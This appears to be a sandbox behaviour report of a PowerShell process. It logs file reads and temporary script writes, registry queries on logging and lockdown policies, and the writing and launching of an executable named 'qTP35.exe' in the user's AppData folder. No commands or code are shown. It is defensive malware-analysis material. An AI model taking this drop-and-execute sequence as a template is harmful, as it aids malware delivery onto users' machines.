Read C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml size = 4096, size_out = 4096 True 51
Read C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml size = 4096, size_out = 2970 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml size = 102, size_out = 0 True 1
Read C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml size = 4096, size_out = 0 True 1
Read C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 size = 4096, size_out = 1528 True 1
Read C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 size = 520, size_out = 0 True 1
Read C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 size = 4096, size_out = 0 True 1
Read C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 size = 4096, size_out = 4096 True 3
Read C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 size = 4096, size_out = 1509 True 1
Read C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 size = 539, size_out = 0 True 1
Read C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 size = 4096, size_out = 0 True 1
Read C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 size = 4096, size_out = 4096 True 5
Read C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 size = 4096, size_out = 2756 True 1
Read C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 size = 316, size_out = 0 True 1
Read C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 size = 4096, size_out = 0 True 1
Read C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 size = 4096, size_out = 737 True 1
Read C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 size = 4096, size_out = 0 True 1
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 4096 True 8
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 3215 True 1
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 0 True 1
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 4096, size_out = 4096 True 4
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 43, size_out = 43 True 1
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 9, size_out = 9 True 1
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 11, size_out = 11 True 1
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 4096, size_out = 3483 True 1
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 4096, size_out = 0 True 1
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 size = 4096, size_out = 4096 True 2
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 size = 5, size_out = 5 True 1
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 size = 4096, size_out = 2818 True 1
Read C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 size = 4096, size_out = 0 True 1
Read C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 4096, size_out = 2384 True 1
Read C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 688, size_out = 0 True 1
Read C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 size = 4096, size_out = 0 True 1
Write C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 size = 1 True 1
Write C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 size = 1 True 1
Write C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 4096 True 4
Write C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex size = 3546 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 4096 True 3
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 10166 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 31944 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 42108 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 5808 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 17684 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 15972 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 5576 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 64344 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 25940 True 1
Write C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 53362 True 1
Delete C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 - True 1
Delete C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 - True 1
Registry (299)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging - False 1
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription - False 1
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{5037b0a0-3a31-5cd2-ff19-103e9f160a74} - False 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST - False 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_CURRENT_USER\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 3
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 17
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 5
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 7
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging - False 1
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML - False 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML - False 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 7
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_CURRENT_USER - True 1
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 4
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN value_name = ServiceStackVersion, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN value_name = ServiceStackVersion, data = 3.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = TZI, type = REG_BINARY True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 17
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 5
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 5
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 7
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 7
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 7
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework value_name = LegacyWPADSupport, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 value_name = HWRPortReuseOnSocketBind, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 4
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 4
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\en-US\tzres.dll.mui base_address = 0x20801580001 True 3
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 2
